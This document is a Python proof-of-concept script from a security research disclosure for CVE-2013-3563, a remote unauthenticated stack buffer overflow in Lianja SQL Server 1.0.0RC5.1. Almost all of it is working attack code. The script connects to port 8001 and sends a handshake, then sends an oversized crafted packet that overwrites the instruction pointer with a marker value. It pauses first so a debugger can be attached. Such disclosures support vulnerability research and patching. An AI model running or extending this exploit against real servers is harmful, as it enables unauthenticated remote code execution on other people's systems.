Lianja SQL Server Stack Buffer Overflow Proof of Concept

lianja_sql_bof.py

#!/usr/bin/env python
"""
lianja_sql_bof.py

Discovered: 5-20-2013
By: Spencer McIntyre (zeroSteiner)
    SecureState Research and Innovation Team
www.securestate.com


Background:
-----------
LianjaSQL Server Remote Unauthenticated Stack Buffer Overflow

Details:
--------
The Lianja SQL server 1.0.0RC5.1 is vulnerable to a stack buffer overflow that
can be triggered when an unauthenticated user sends a specially crafted packet.
The result can lead to remote code execution as the user which runs the Lianja
SQL server.

Vulnerable Versions:
--------------------
Tested on:
    Lianja SQL Server 1.0.0RC5.1 Windows XP SP2
    Lianja SQL Server 1.0.0RC5.1 Windows XP SP3
    Lianja SQL Server 1.0.0RC5.1 Windows Server 2003
    Lianja SQL Server 1.0.0RC5.1 Windows 7 SP1
Vendor: Lianja
Site: http://www.lianja.com/

References:
-----------
CVE-2013-3563
"""

import sys
import socket

def main():
	if len(sys.argv) < 2:
		print '[-] Usage: ' + sys.argv[0] + ' [TARGET_IP]'
		return 0

	data_1 = '000152E1' + 'A' + ('0' * 19991) + 'BBBB'

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((sys.argv[1], 8001))

	s.send("db_net")
	s.recv(4)

	# At this point the main SQL Server process has spawned the db_netserver.exe
	# process.  Attach a debugger to db_netserver.exe before continuing.
	raw_input('Attach a debugger to db_netserver.exe, then hit enter to continue')
	# In this example EIP is overwritten with \x42\x42\x42\x42.

	s.send(data_1)
	s.close()

if __name__ == '__main__':
	main()